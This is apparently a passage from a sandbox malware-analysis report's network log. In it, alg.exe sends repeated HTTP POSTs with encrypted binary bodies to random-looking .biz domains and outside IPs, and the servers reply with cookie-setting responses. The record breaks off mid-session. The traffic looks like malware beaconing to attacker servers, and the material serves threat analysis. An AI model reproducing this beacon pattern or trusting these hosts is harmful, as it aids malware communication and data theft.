                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.865259886 CET842OUTData Raw: cf 53 3c 97 f5 7f 1f ef 3e 03 00 00 4d 84 16 89 c2 27 8f a7 29 8d ea b6 d7 1b 76 6c 7d ed 80 f7 00 92 d0 bc a6 45 e6 25 16 a0 05 50 65 34 65 04 eb 1f 27 06 70 08 25 df f3 56 48 75 70 48 fb 9d f4 08 0e d4 87 60 98 16 99 a6 d1 61 34 54 31 f1 39 4b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: S<>M')vl}E%Pe4e'p%VHupH`a4T19K{]4"Fsfxppibf" Vhx,H=3*)f=T{U:.bSiSY6t7_Q`};_/Au!


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      29192.168.2.75000882.112.184.197805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.293071032 CET351OUTPOST /pjqqch HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.293097019 CET778OUTData Raw: 85 bb c8 7e f6 34 39 dc fe 02 00 00 70 74 01 73 38 df 8e 78 b5 a0 42 ba 76 34 4f 6f 31 3a bd e0 76 f6 57 7c e9 a8 1c ed a4 51 11 50 5e bc 5f 49 06 0e be f7 90 9d b5 2b f2 15 e2 44 81 8d ae a6 25 9e 36 59 6b 67 4c c3 57 23 98 10 43 77 f7 c9 69 ed
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ~49pts8xBv4Oo1:vW|QP^_I+D%6YkgLW#CwiuQWyW 08T:k!qqU{[h3%ssL?;tiVf|G"`2wS'QNh0x$0F,V!7Jw^gLB#r+=G)FAHpX*cj


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      30192.168.2.750009172.234.222.13880
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.546947002 CET347OUTPOST /saqm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:30.546947002 CET842OUTData Raw: 93 ae 6a bf 15 3f ad 51 3e 03 00 00 a8 e6 69 2e bc e2 37 f4 65 34 89 50 b6 c7 eb 4f 85 c7 2f 59 50 a8 be 0d 61 96 81 b2 06 da 3d 7e 0a 6e 0b 0c 29 71 14 1f 82 3e 68 70 63 18 1e bd 9d d8 35 ea 86 2b 2f 3f d9 e9 50 98 64 db f4 ba 85 8d df 1b 17 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: j?Q>i.7e4PO/YPa=~n)q>hpc5+/?Pdk5|+@GE@ofz//Zl:&WY_!nvgHZXMPJ\3_mNC]6zah)XLU})ySN86]1ogT[!qE",:1


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      31192.168.2.75001018.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.581667900 CET353OUTPOST /xyuwwggfo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.581667900 CET842OUTData Raw: ba 35 92 fc 6c 89 96 2d 3e 03 00 00 4b d3 ac fc f8 26 61 79 ef 82 ea f8 55 a6 a5 46 18 d6 27 32 96 ae d4 27 b6 1c 23 48 77 21 ac 64 97 56 3b 0a 8a da c6 8f 8d 03 62 77 07 a2 10 18 ac b2 16 34 91 5d ba e2 b4 61 b6 2a 9e 0c b3 22 b8 0a 8a 74 e1 28
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5l->K&ayUF'2'#Hw!dV;bw4]a*"t(|xtLFJescL}YKRs>kKhW;7@M'MV0pc*08wN*kfxTsU} F<wu7]tkeqY94{rTnn'029
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.032638073 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4b62e5563c9e974733579b13cb762da4|155.94.241.187|1731920252|1731920252|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      32192.168.2.75001147.129.31.212805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.868765116 CET358OUTPOST /kywuwrijhguqpyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.868765116 CET778OUTData Raw: 3d 63 61 01 84 45 d3 a8 fe 02 00 00 26 dd 75 e7 b2 3a 9d 2c 91 5f e1 6c c9 58 23 e0 d7 8f 3f b5 0b 91 7d ad 02 2f 94 33 85 27 a6 bf ad 14 68 d8 20 13 f0 36 39 af 89 cb fd 00 01 3b 03 3c 85 2d b6 33 02 17 dd 13 ca e0 bd 22 84 fe ae 67 41 5a be f9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: =caE&u:,_lX#?}/3'h 69;<-3"gAZb|7o:Hw>LMU|%+jiz=+lW(XsY04"d3.'?$5PfR\ hMP|9PN9`4t
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.374553919 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=12504401d5a68c9798c0ec817d9bcdb7|155.94.241.187|1731920253|1731920253|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      33192.168.2.75001282.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.067526102 CET354OUTPOST /pjybylbfofdj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.067526102 CET842OUTData Raw: ab 5c b9 00 03 a3 3c b2 3e 03 00 00 25 e7 55 be 71 14 eb 8b 1b df 36 d4 83 b4 9a 3c ed c7 08 0c 8a 6d e6 b7 fc 0a 09 86 7c 58 fd ef e1 8f 23 ee a7 e4 3e dc f2 55 2b 05 af df c8 48 bb 06 76 e5 97 88 d5 0a c8 3b eb b6 b2 e2 27 12 72 39 ce e2 49 ab
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: \<>%Uq6<m|X#>U+Hv;'r9ITqy:RoLt9ONmUzYvZyTU;ZCjv)S.A)OeISVpFa:FEs7!53(rcSoh'-\h9%/(;M7w;H)TyM


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      34192.168.2.75001313.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.746913910 CET345OUTPOST /kha HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.746958971 CET778OUTData Raw: a4 43 93 cf 86 4f 98 7d fe 02 00 00 d8 dc 02 08 9e 72 5a dd 83 3d 40 49 42 eb f0 58 89 88 d8 6e 81 b5 54 71 8d 6a 49 2b 0d a3 36 50 9f be c7 c4 f8 8f 89 1c 72 35 65 3c 77 25 fb bc 52 c4 cf 40 81 64 b2 40 61 ac 54 b0 46 f8 87 64 a3 4a 9e f4 54 ab
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: CO}rZ=@IBXnTqjI+6Pr5e<w%R@d@aTFdJT}FV|8Mi?X;867M:FAf89t_6?`JF!t|'oRsg32`~(L1bEz#.b&)O(TaVsKilhBjYv,i
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.190474987 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=6278f0b2a7cedbd721446296139ece85|155.94.241.187|1731920254|1731920254|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      35192.168.2.75001444.221.84.105805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.406069040 CET347OUTPOST /sa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.406069040 CET778OUTData Raw: 90 3d ec 69 44 ec bc a2 fe 02 00 00 a0 26 0f 9d 0a 4a 0b 57 82 d1 10 b9 a0 20 f9 e6 c6 c5 4f 47 de bd d5 74 33 95 07 34 43 19 00 da 5b a9 33 c6 ae 9e aa ad 34 57 fb 66 9a b8 24 85 77 0d 10 e5 3f 25 95 98 41 51 c7 10 a7 24 18 ab 49 7a e8 af b6 b5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: =iD&JW OGt34C[34Wf$w?%AQ$IzM%zVO#PP}{B^-wVS[n&_:{,g(. Ty#^Lk)u0kPB3:|L;J-.t>!Y.-eq4*+dLv-u+
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.077414036 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=2e3975f80ed4e812ccb2edd0435ddb50|155.94.241.187|1731920255|1731920255|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      36192.168.2.75001518.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.241530895 CET350OUTPOST /idasaqn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.241550922 CET778OUTData Raw: 9f cb 3a 05 90 97 39 21 fe 02 00 00 40 19 2d 59 14 6d cd a5 74 5e d0 f9 45 af 78 44 cc 6e 55 87 f9 45 61 54 58 0e fb 05 02 fc 33 31 75 60 1d 10 4b f2 80 67 35 6d d2 5a 3a 1b 80 e8 64 2b 62 5b 1e dd d3 a2 6a f8 0c 36 30 ef de fd 86 31 93 2e 59 22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: :9!@-Ymt^ExDnUEaTX31u`Kg5mZ:d+b[j601.Y"\90<5O6XMi:Ay_)zW91I1"r#B;!kz,bN\(6>Pp^nHsj~T(%l~
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.713766098 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=8f68faa2875b6855dc959ae73779e78e|155.94.241.187|1731920257|1731920257|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      37192.168.2.750016172.234.222.138805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.934586048 CET344OUTPOST /hge HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.934741020 CET778OUTData Raw: 3b be 2e 69 c6 6f 64 27 fe 02 00 00 c0 08 5f c4 70 a6 03 7f 77 20 cd 26 ce 44 7d 36 46 55 8c ed a1 f6 6b b1 38 92 b3 31 81 00 7f f7 8d b5 c9 54 5b 0e ea d3 ba 29 f8 45 d6 c6 dc 84 25 82 02 3c 66 7c 23 e4 7a ce d1 80 7f 89 ae e8 5a 86 3a 34 4e 25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;.iod'_pw &D}6FUk81T[)E%<f|#zZ:4N%XoXY3MNq6mE-"wc$YNo=6~PS^],i)p&jS&5:Dv6Y>F<ovA=99m`&O?oOn,o y


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      38192.168.2.750017172.234.222.138805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.859786987 CET353OUTPOST /sycehlfxifni HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:38.859786987 CET778OUTData Raw: 7b fe 33 c5 2a 9c 93 39 fe 02 00 00 f0 2e 2a c6 94 95 c9 bd 12 61 e8 fa d4 cb af b5 db 49 1d 77 32 6a 1b cb 13 ac 10 65 4c 1a 20 63 cb 4d 56 3b 1c 95 69 22 0e 4d 2f 29 46 d0 71 01 27 c5 cf 10 02 ed 97 27 cb 9a 79 31 aa bb 70 68 d8 7e f8 7e 6c 9d
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {3*9.*aIw2jeL cMV;i"M/)Fq''y1ph~~lpHw?0xL4w*+v~[RAYVQ.T0UF])K&01g|{5L<|p3VMV"}o[w%qE'7T^h l.8ROqXk!d7


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      39192.168.2.75001834.246.200.160805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.741772890 CET350OUTPOST /umftqsqq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.741792917 CET778OUTData Raw: 07 be 99 35 46 16 91 8c fe 02 00 00 4a f5 9c 93 f7 41 dd 73 12 ad 46 f2 31 37 d7 77 d1 9f 39 79 ec 94 7b fb 97 f2 60 c3 3a bf 43 c2 54 83 bb d6 2e 8b e0 87 dc 56 f5 37 7f d8 3b 77 a5 9a 46 9c f7 4d 46 ec 43 75 60 16 50 55 7b c0 40 f0 92 6c 7d 60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5FJAsF17w9y{`:CT.V7;wFMFCu`PU{@l}`-NUw)+]l`}1zq5wK(A6xke?)!' h\,3O`myA6hSzW)~;ja;;vP^L
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.697495937 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bcbd7dd1420ae13cea07939741e38fbe|155.94.241.187|1731920260|1731920260|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      40192.168.2.75001918.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.943301916 CET348OUTPOST /jisysli HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
